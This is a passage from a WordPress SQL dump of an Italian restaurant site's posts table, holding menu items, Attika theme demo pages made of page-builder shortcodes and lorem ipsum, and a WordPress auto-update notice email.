17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/classic-8/',25,'nav_menu_item','',0),(4023,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Presentation','','publish','closed','closed','','presentation-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/presentation-8/',34,'nav_menu_item','',0),(4024,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Infographic','','publish','closed','closed','','infographic-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/infographic-8/',42,'nav_menu_item','',0),(4025,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Typography','','publish','closed','closed','','typography-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/typography-8/',51,'nav_menu_item','',0),(4026,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Single Types','','publish','closed','closed','','single-types-10','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/single-types-10/',62,'nav_menu_item','',0),(4027,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Post Types','','publish','closed','closed','','post-types-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/post-types-7/',17,'nav_menu_item','',0),(4028,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Post Types','','publish','closed','closed','','post-types-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/post-types-8/',26,'nav_menu_item','',0),(4029,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Single Types','','publish','closed','closed','','single-types-11','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/single-types-11/',39,'nav_menu_item','',0),(4030,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Layouts','','publish','closed','closed','','layouts-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/layouts-7/',54,'nav_menu_item','',0),(4031,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Slider','','publish','closed','closed','','slider-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/slider-7/',49,'nav_menu_item','',0),(4032,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Portfolio','','publish','closed','closed','','portfolio-16','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-16/',20,'nav_menu_item','',0),(4033,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Layouts','','publish','closed','closed','','layouts-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/layouts-8/',31,'nav_menu_item','',0),(4034,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Slider','','publish','closed','closed','','slider-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/slider-8/',26,'nav_menu_item','',0),(4035,1,'2018-08-08 13:10:07','2018-08-08 13:10:07','[vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1535635181617{padding-top: 130px !important;}\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_1367_1600=\"0 0 0% 0\" item_padding_1025_1366=\"0 0 0% 0\" item_padding_769_1024=\"0 0 11% 0\" item_padding_681_768=\"0 0 13% 0\" item_padding_680=\"0 0 20% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Opening hours\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 0 20%\"]Tuesday to Thursday\n12pm - 1 am (last order)[vc_empty_space height=\"30px\"]Friday to Sunday\n12pm - 2:30 am (last order)[vc_empty_space height=\"30px\"]Monday\nWe’re closed[/mkdf_section_title][vc_empty_space height=\"62px\"][mkdf_button type=\"simple\" text=\"Book a table\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-1 vc_col-md-4 vc_hidden-xs\"][/vc_column][vc_column offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\n<p style=\"text-align: left;\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis..</p>\n[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][vc_column offset=\"vc_col-lg-3 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\n<p style=\"text-align: left;\">Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>\n[/vc_column_text][vc_empty_space height=\"85px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-4 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"2120\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"20px 0 -10px 50%\" line_length=\"45px\" title=\"Reservation\"][/mkdf_section_title][contact-form-7 id=\"831\"][/vc_column][/vc_row]','Opening Hours','','publish','closed','closed','','opening-hours','','','2018-08-08 13:10:07','2018-08-08 13:10:07','',0,'http://attika.mikado-themes.com/?page_id=793',0,'page','',0),(4614,0,'2021-02-04 02:02:36','2021-02-04 01:02:36','Ciao! Il tuo sito su https://www.ristorantesolymar.it/vecchio è stato aggiornato automaticamente a WordPress 5.6.1.\n\nNon è richiesta da parte tua alcuna altra operazione. Per altre informazioni sulla versione 5.6.1 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nVi sono anche alcuni plugin o temi con aggiornamenti disponibili. Aggiornali ora:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/\n\nIl team di WordPress\n','[Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.1','','private','closed','closed','','sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-1','','','2021-02-04 02:02:36','2021-02-04 01:02:36','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-1/',0,'postman_sent_mail','',0),(4598,71,'2021-01-26 09:17:43','2021-01-26 08:17:43','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2910\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"773\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Welcome to Attika, one of the best restaurants in the country. This is the place where food meets passion and where the world’s finest chefs are creating the culinary masterpieces that are sure to enchant all of your senses. The perfect combination of truly exquisite, delicious food, the friendly staff and the warm ambience will make you feel at home.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"156\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Nunc ullamcorper auctor leo a rutrum. Nullam non ex cursus, tincidunt quam ac, euismod dolor. Phasellus ex augue, euismod nec dui nec, efficitur blandit lectus. Mauris euismod maximus dolor, sit amet porta arcu blandit in. Praesent quis massa vitae orci tempus laoreet. Phasellus ex augue.[vc_empty_space height=\"30px\"]Maecenas vulputate commodo semper. Morbi ornare cursus nunc, a vestibulum erat dignissim vel. Quisque vitae vehicula.[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/big-chefs-recomend/\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Only the finest food &amp; great service\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"206\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"205\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Attika\r\nFine\r\nDining\r\nRestaurant</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]<a href=\"https://www.google.com/maps/place/35+Rainbow+Ridge+Dr,+Livingston,+NJ+07039,+USA/@40.8114217,-74.3334163,15.04z/data=!4m5!3m4!1s0x89c3a997640392e1:0xe5e9cdfe2711609c!8m2!3d40.8140015!4d-74.3310237\" target=\"_blank\" rel=\"noopener noreferrer\">Rainbow Ridge Dr street 35</a>\r\n<a href=\"https://www.google.com/maps/place/New+York,+NY,+USA/@40.6976637,-74.119763,11z/data=!3m1!4b1!4m5!3m4!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62!8m2!3d40.7127753!4d-74.0059728\" target=\"_blank\" rel=\"noopener noreferrer\">NY City, NY</a>[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_testimonials skin=\"\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" slider_pagination=\"no\" number=\"6\" category=\"testimonials-1\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Demo Main','','publish','closed','closed','','demo-main','','','2021-01-26 09:20:13','2021-01-26 08:20:13','',0,'https://www.ristorantesolymar.it/?page_id=4598',0,'page','',0),(4038,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4038','','','2021-01-23 18:36:14','2021-01-23 